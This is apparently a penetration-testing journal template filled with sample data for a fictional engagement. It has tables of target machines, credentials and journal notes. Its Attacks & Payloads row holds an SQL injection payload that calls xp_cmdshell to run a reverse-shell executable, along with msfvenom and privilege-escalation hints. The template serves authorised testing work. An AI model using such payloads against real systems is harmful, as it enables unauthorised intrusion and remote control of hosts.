Pentest Journal Template (1)

✏️ Overview

🗒️

Name

Company XY pentest

📅

Time Frame

12 Jan 2024 - 14 Jan 2024

🎯

Goal

Obtain domain admin account

📝

Description

This template is designed to streamline the documentation process during penetration testing. It is divided into four main sections: Machines, Attacks & Payloads, Credentials, and Journal.
The key to effectively using this template is to continuously update each section with new findings and details as your exploration progresses.
You can remove this section or replace it with the complete task description.
Keep in mind that this is not a Pentest Report.

🖥️ Machines

Name	IP	Is Pwned	Is in domain	Has AV	Has FW	Operating System	Observations	Successful Attack Vector	Open Ports	Additional Notes
Alpha-	192.168.1.101	⛔	✅	⛔	✅	Windows 10	SMB Vulnerability, RDP Brute Force		135, 445, 3389	SMB seems vulnerable to EternalBlue
Beta-Server	192.168.1.102	✅	⛔	✅	✅	Ubuntu 18.04	SSH Weak Credentials, Exposed FTP	SSH using found credentials	22, 21, 80	Credentials found in previous breach dump
Gamma-Box	192.168.1.103	⛔	⛔	⛔	⛔	CentOS 7	Outdated Apache Server, Misconfigured sudo		80

☑️ Findings

☑️ Attacks & Payloads

Machine	Attack Vector	Prerequisites	Payload	Additional Notes
Alpha-Node	SQLi on /login	`msfvenom -p windows/shell_reverse_tcp download payload, store in temp, run it`	`ProductID=1';EXEC master.dbo.xp_cmdshell "powershell C:\windows\temp\reverse.exe"; —`	use GodPotato to escalate privileges to `nt authority\system`

👥 Credentials

Username	Hash	Password	Is domain user	Purpose	Additional Notes
admin		password123	✅	Admin login for Gamma-Box	Common password, easily guessed.
jdoe		summer2024!	⛔	SSH access to Beta-Server	Password obtained in phishing attack.
backup_user	8846f7eaee8fb117ad06bdd830b7586c		⛔	Backup service on Alpha-Node	Long time to crack using rockyou.txt.

📘 Reports

📘 Journal

Timestamp	Machine	Note
12:34	Beta-Server	Found common credentials using a previously known breach database. Gained SSH access.